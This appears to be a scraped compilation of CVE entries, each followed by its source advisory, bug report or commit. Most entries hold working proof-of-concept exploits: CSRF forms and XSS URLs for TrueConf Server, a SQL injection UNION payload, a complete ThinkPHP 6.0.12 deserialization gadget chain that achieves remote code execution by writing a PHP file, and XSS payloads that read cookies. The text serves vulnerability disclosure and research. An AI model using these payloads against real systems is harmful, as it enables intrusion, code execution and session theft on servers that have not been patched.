A vulnerability classified as problematic was found in TrueConf Server 4.3.7. This vulnerability affects unknown code of the file /admin/service/stop/. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.

    TrueConf Server v4.3.7 Multiple Remote Web Vulnerabilities
    
    
    Vendor: TrueConf LLC
    Product web page: https://www.trueconf.com
    Affected version: 4.3.7.12255 and 4.3.7.12219
    
    Summary: TrueConf Server is a powerful, high-quality and highly secured
    video conferencing software server. It is specially designed to work with
    up to 250 participants in a multipoint conference over LAN or VPN networks.
    TrueConf Server requires no hardware and includes client applications for
    all popular platforms, making it an easy-to-set up, unified communications
    solution.
    
    Desc: The administration interface allows users to perform certain actions
    via HTTP requests without performing any validity checks to verify the requests.
    This can be exploited to perform certain actions with administrative privileges
    if a logged-in user visits a malicious web site.
    
    Input passed via the 'redirect_url' GET parameter is not properly verified before
    being used to redirect users. This can be exploited to redirect a user to an
    arbitrary website e.g. when a user clicks a specially crafted link to the affected
    script hosted on a trusted domain.
    
    TrueConf also suffers from multiple stored, reflected and DOM XSS issues when
    input passed via several parameters to several scripts is not properly sanitized
    before being returned to the user. This can be exploited to execute arbitrary HTML
    and script code in a user's browser session in context of an affected site.
    
    
    Tested on: Microsoft Windows 7 Professional SP1 (EN)
               Apache/2.4.17 (Win32)
               PHP/5.4.41
    
    
    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                @zeroscience
    
    
    Advisory ID: ZSL-2017-5393
    Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5393.php
    
    
    01.11.2016
    
    --
    
    
    CSRF Stored XSS:
    ----------------
    
    <html>
      <body>
        <form action="http://127.0.0.1:8888/admin/conferences/applyCreate" method="POST">
          <input type="hidden" name="send&#95;invite&#95;mail" value="1" />
          <input type="hidden" name="invitation&#95;type" value="&#45;1" />
          <input type="hidden" name="hide&#95;invitation&#95;type" value="&#45;1" />
          <input type="hidden" name="date" value="22&#46;01&#46;2017" />
          <input type="hidden" name="time&#45;field" value="17&#58;27" />
          <input type="hidden" name="time&#95;zone" value="60" />
          <input type="hidden" name="subtype" value="3" />
          <input type="hidden" name="podiums" value="6" />
          <input type="hidden" name="cid" value="&#92;c&#92;dfa95f7e1d" />
          <input type="hidden" name="key" value="dfa95f7e1d" />
          <input type="hidden" name="topic" value="<script>alert&#40;&apos;XSS&apos;&#41;<&#47;script>" />
          <input type="hidden" name="description" value="" />
          <input type="hidden" name="owner" value="" />
          <input type="hidden" name="gconf&#45;edit" value="ok" />
          <input type="hidden" name="webTtype" value="0" />
          <input type="submit" value="Submit form" />
        </form>
      </body>
    </html>
    
    
    
    Reflected XSS:
    --------------
    
    http://127.0.0.1:8888/admin/conferences/get-all-status/?keys[]=<img src=j onerror=confirm(251) >
    http://127.0.0.1:8888/admin/conferences/list/?sort=status%26'%22()%26%25<div><ScRiPt%20>prompt(251)</ScRiPt>
    http://127.0.0.1:8888/admin/group/list/?checked_group_id=0001&sort=name
    http://127.0.0.1:8888/admin/group/list/?checked_group_id=' onmouseover=confirm(251) ?
    
    
    
    DOM XSS:
    --------
    
    http://127.0.0.1:8888/admin/group?'\><script>confirm("XSS")</script>
    http://127.0.0.1:8888/admin/conferences/list/?domxss=javascript:domxssExecutionSink(1,"'\"><script>alert("XSS")</script>
    
    
    
    Open Redirect:
    --------------
    
    Request:
    
    GET /admin/general/change-lang?lang_on=en&redirect_url=http://www.zeroscience.mk HTTP/1.1
    Host: 127.0.0.1:8888
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
    Accept: */*
    
    Response:
    
    HTTP/1.1 302 Found
    Date: Thu, 22 Sep 2016 21:15:40 GMT
    Server: Apache
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: http://www.zeroscience.mk
    Content-Length: 0
    Keep-Alive: timeout=5, max=75
    Connection: Keep-Alive
    Content-Type: text/html; charset=utf-8
    
    
    
    CSRF Stop Web Service:
    ----------------------
    
    <html>
      <body>
        <form action="http://127.0.0.1/admin/service/stop/" method="POST">
          <input type="submit" value="Submit form" />
        </form>
      </body>
    </html>

CVE-2017-20120: Offensive Security’s Exploit Database Archive

Online Railway Reservation System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/inquiries/view_details.php.

Permalink

Cannot retrieve contributors at this time

**Online Railway Reservation System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html

Vulnerability File: /orrs/admin/inquiries/view\_details.php?id=

Vulnerability location: /orrs/admin/inquiries/view\_details.php?id=, id

dbname = orrs\_db

\[+\] Payload: /orrs/admin/inquiries/view\_details.php?id=-1%27%20union%20select%201,database(),3,4,5,6,7--+ // Leak place ---> id

GET /orrs/admin/inquiries/view\_details.php?id\=\-1%27%20union%20select%201,database(),3,4,5,6,7\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=hea24clorqs9kplqalqihp0ik4
Connection: close

CVE-2022-33042: bug_report/SQLi-1.md at main · 736335151/bug_report

ThinkPHP v6.0.12 was discovered to contain a deserialization vulnerability via the component vendor\league\flysystem-cached-adapter\src\Storage\AbstractCache.php. This vulnerability allows attackers to execute arbitrary code via a crafted payload.

**ThinkPHP RCE链子**

**Environment installation**  
test version:Thinkphp6.0.12  
Environment configuration：(tp6只支持用composer安装)  
composer create-project topthink/think=6.0.12 tp612  
Add deserialization entry point

<?php

namespace app\\controller;

  

use app\\BaseController;

use think\\facade\\Request;

class Index extends BaseController

{

    public function index()

    {

        $payload\=Request::post('cmd');

        unserialize($payload);

    }

  

    public function hello($name = 'ThinkPHP6')

    {

        return 'hello,' . $name;

    }

}

    direct interview
    http://127.0.0.1 
    post to send package
    

cmd=O%3A17%3A%22think%5Cmodel%5CPivot%22%3A4%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A12%3A%22%00%2A%00withEvent%22%3Bb%3A0%3Bs%3A8%3A%22%00%2A%00table%22%3BO%3A15%3A%22think%5Croute%5CUrl%22%3A4%3A%7Bs%3A6%3A%22%00%2A%00url%22%3Bs%3A2%3A%22a%3A%22%3Bs%3A9%3A%22%00%2A%00domain%22%3Bs%3A27%3A%22%3C%3Fphp+phpinfo%28%29%3B+exit%28%29%3B+%3F%3E%22%3Bs%3A6%3A%22%00%2A%00app%22%3BO%3A16%3A%22think%5CMiddleware%22%3A1%3A%7Bs%3A7%3A%22request%22%3Bi%3A2333%3B%7Ds%3A8%3A%22%00%2A%00route%22%3BO%3A20%3A%22think%5Cconsole%5COutput%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22getDomainBind%22%3B%7Ds%3A28%3A%22%00think%5Cconsole%5COutput%00handle%22%3BO%3A21%3A%22League%5CFlysystem%5CFile%22%3A2%3A%7Bs%3A7%3A%22%00%2A%00path%22%3Bs%3A10%3A%22huahua.php%22%3Bs%3A13%3A%22%00%2A%00filesystem%22%3BO%3A25%3A%22think%5Csession%5Cdriver%5CFile%22%3A0%3A%7B%7D%7D%7D%7Ds%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22huahua%22%3B%7D%7D

accesssess_huahua.php  
successfully RCE

exp

<?php  
namespace think\\model\\concern{  
    trait Attribute{  
        private $data = \['huahua'\]; 
    }  
}  
  
namespace think\\view\\driver{  
    class Php{}  
}
namespace think\\session\\driver{
    class File{

    }
}
namespace League\\Flysystem{
    class File{
        protected $path;
        protected $filesystem;
        public function \_\_construct($File){
            $this\->path\='huahua.php';
            $this\->filesystem\=$File;
        }
    }
}
namespace think\\console{
    use League\\Flysystem\\File;
    class Output{
        protected $styles\=\[\];
        private $handle;
        public function \_\_construct($File){
            $this\->styles\[\]='getDomainBind';
            $this\->handle\=new File($File);
        }
    }
}  
namespace think{  
    abstract class Model{  
        use model\\concern\\Attribute;  
        private $lazySave;  
        protected $withEvent;  
        protected $table;  
        function \_\_construct($cmd,$File){  
            $this\->lazySave = true;  
            $this\->withEvent = false;  
            $this\->table = new route\\Url(new Middleware,new console\\Output($File),$cmd);  
        }  
    }  
    class Middleware{  
        public $request = 2333;  
    }   
}  
  
namespace think\\model{  
    use think\\Model;  
    class Pivot extends Model{}   
}  
  
namespace think\\route{  
    class Url  
    {  
        protected $url = 'a:';  
        protected $domain;  
        protected $app;  
        protected $route;  
        function \_\_construct($app,$route,$cmd){  
            $this\->domain = $cmd;  
            $this\->app = $app;  
            $this\->route = $route;  
        }  
    }  
}  
  
namespace{  
    echo urlencode(serialize(new think\\Model\\Pivot('<?php phpinfo(); exit(); ?>',new think\\session\\driver\\File)));  
}

CVE-2022-33107: ThinkPHP 6.0.12 Unserialize RCE · Issue #2717 · top-think/framework

Textpattern CMS v4.8.7 and older vulnerability exists through Sensitive Cookie in HTTPS Session Without 'Secure' Attribute via textpattern/lib/txplib_misc.php. The secure flag is not set for txp_login session cookie in the application. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site.

Permalink

Browse files

Secure cookie test

*   Loading branch information

1 parent 925e363 commit 211fab0093999f59b0b61682aa988ac7d8337aa9

Showing **1 changed file** with **1 addition** and **1 deletion**.

@@ -1033,7 +1033,7 @@ function set\_cookie($name, $value = '', $options = array())

'expires' => time() - 3600,

'path' => '',

'domain' => '',

'secure' => false,

'secure' => strtolower(PROTOCOL) == 'https://',

'httponly' => false,

'samesite' => 'Lax' // None || Lax || Strict

);

**0 comments on commit 211fab0**

Please sign in to comment.

CVE-2021-40642: Secure cookie test · textpattern/textpattern@211fab0

A vulnerability classified as problematic has been found in Easy Table Plugin 1.6. This affects an unknown part of the file /wordpress/wp-admin/options-general.php. The manipulation with the input "><script>alert(1)</script> leads to basic cross site scripting. It is possible to initiate the attack remotely.

CVE-2017-20108

SourceCodester Zoo Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via public_html/register_visitor?msg=.

    # Exploit Title: Zoo Management System 1.0 - Reflected Cross-Site-Scripting (XSS)# Date: 06/22/2022# Exploit Author: Angelo Pio Amirante# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15344/zoo-management-system-phpoop-free-source-code.html# Version: 1.0# Tested on: Server: XAMPP on Windows 10 # CVE: CVE-2022-31897# Description:Zoo Management System 1.0 is vulnerable to reflected cross-site scripting on the sign-up page. The "msg" parameter in 'http://localhost/public_html/register_visitor?msg=' is vulnerable.# Impact:An attacker could steal cookies with a crafted URL sent to the victims.# Exploit:Visit the following page: 1) http://localhost/public_html/register_visitor?msg=<script>alert(window.navigator.userAgent)</script>2) Alert pop up is fired!# Image poc:https://ibb.co/8XKDgJX -> Registration pagehttps://ibb.co/mTTmTmy -> XSS

CVE-2022-31897: Zoo Management System 1.0 Cross Site Scripting ≈ Packet Storm

In Nagios XI through 5.8.5, an open redirect vulnerability exists in the login function that could lead to spoofing.

The following is a list of my collected CVE's

**Nagios XI**

Nagios XI is an enterprise monitoring solution, see https://www.nagios.com/products/nagios-xi/ for more information. During an pentest i've found 4 0days:

*   CVE-2022-29270 No password conformation during e-mail change leads to account takeover
*   CVE-2022-29272 Open redirect in login form
*   CVE-2022-29269 HTML injection in schedueld report mails
*   CVE-2022-29271 Permissions issue where read-only users could schedule downtimes using downtime.php

**Glory Systems, RBW-100**

The Glory RBW-100 banknote recycling system controls cash and removes the need for manual note handling. I've found two vulnerabilities in the Font Circle Controller management interface that can lead to a reverse root-shell:

*   CVE-2019-10479 - Default hardcoded credentials
*   CVE-2019-10478 - Arbitrary file upload

See a POC, combining these two vulnerabilities in action: https://youtu.be/MSKDfLpPOLw

CVE-2022-29272: GitHub - sT0wn-nl/CVEs: The following is a list of my collected CVE's

A reflected Cross Site Scripting (XSS) in wuzhicms v4.1.0 allows remote attackers to execute arbitrary web script or HTML via the imgurl parameter.

A xss vulnerability was discovered in WUZHI CMS 4.1.0

There is a reflected XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the imgurl parameter of /index.php?m=core&f=index&\_su=wuzhicms.

POC  
ji</textarea> <img/src=1 onerror=alert(document.cookie)>

Vulnerability trigger point  
http://localhost/index.php?m=core&f=index&\_su=wuzhicms. When attacker access -system settings - basic settings, Write poc in the statcode form , then XSS vulnerability is triggered successfully.

1、choose this part and write poc to \[statcode\] form  

2、submit and view webpage

CVE-2020-19897: wuzhicms v4.1.0 statcode reflected xss vulnerability  · Issue #183 · wuzhicms/wuzhicms

File inclusion vulnerability in Minicms v1.9 allows remote attackers to execute arbitary PHP code via post-edit.php.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2020-19896: file inclusion vulnerability · Issue #36 · bg5sbk/MiniCMS

Silverstripe silverstripe/assets through 1.10 allows XSS.

Tag

#php